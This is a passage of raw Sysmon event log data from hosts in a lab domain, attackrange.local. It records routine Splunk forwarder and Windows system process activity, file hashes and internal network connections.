Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA328F5B03D3413E0EC68540B0B7951D,SHA256=BB22DD7A0C4AE98363875FAD319B97C319190BC071DB51F23E0E740E84128BD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:39.758{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50972-false10.0.1.12-8000- 23542300x80000000000000001047549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:47.424{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2081E51F8A0B1C14A793418917EFD61,SHA256=BE22AE7E47D62224EFE799A01170CF2EB241C9ED7A02A91D0779AF6FBE5F8DDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:45.330{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57219-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:47.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880DDF48CA22D26DC93B48E2FF4F3D7E,SHA256=B6AF809A6748C4E400CBE00C80D1C138E1DD9921B584F3E062D9C0D0BB159DFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.443{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44105EED7C7FBF31783E49E210587731,SHA256=0E7B38C8DEDACB5EEF1E5A4991B16638C6021E8D15876F171E38E74723EAA0E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:48.119{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DFF04D624CD4B8698DDBE28DC5DB138,SHA256=057C40A838ADCE9F301CA2BA8653FE97C66B4E8D94E21D4EF31828EB86BC56A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.090{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.090{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.074{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.059{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.059{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:48.059{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F3E0-60EB-0C7D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:49.458{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAF118B736CA86D47703469B62878C39,SHA256=CD60E1A860AAD0894068D759C0B520A605542D0FFBCEC56833CB25FB2CDD10FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:49.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=680BE8178CDAFDD7D9F777C4DBE54AED,SHA256=F5D08CFF20818D8A62EAED46BE73EF295E6AF507BEFE2266683F6953AE2D443B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:49.058{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E0D02F7B01C021201C015C9E53D43008,SHA256=BFEA0F27BD20FC7392EB5A1CB0CB0A6C6C9CD53A191B3685D2D1E62AA4A8D858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:49.058{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2433A24315A2832E989A303883D45F6,SHA256=69C87F84752497B52D6BE7F9249FE99695D4753907B7054B4BC091F35487486C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.725{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.724{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.723{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.722{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.705{466BC892-F3E2-60EB-0E7D-00000000CF01}9460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.488{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A49D395BF5494EDC4A30E010D6793F3,SHA256=1216763C8D2A124D52F70AE3A452702023AB1B812B1D6A9F866A54A3E1E2941B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:50.150{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCC60ACAC32F423EACD35F09254532C2,SHA256=EFA2434BB709D7E7BA39B17BCE4413D86708ECE26F52E553EEA36862D05DB63E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.388{466BC892-F3E2-60EB-0D7D-00000000CF01}71129060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.205{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.189{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.190{466BC892-F3E2-60EB-0D7D-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 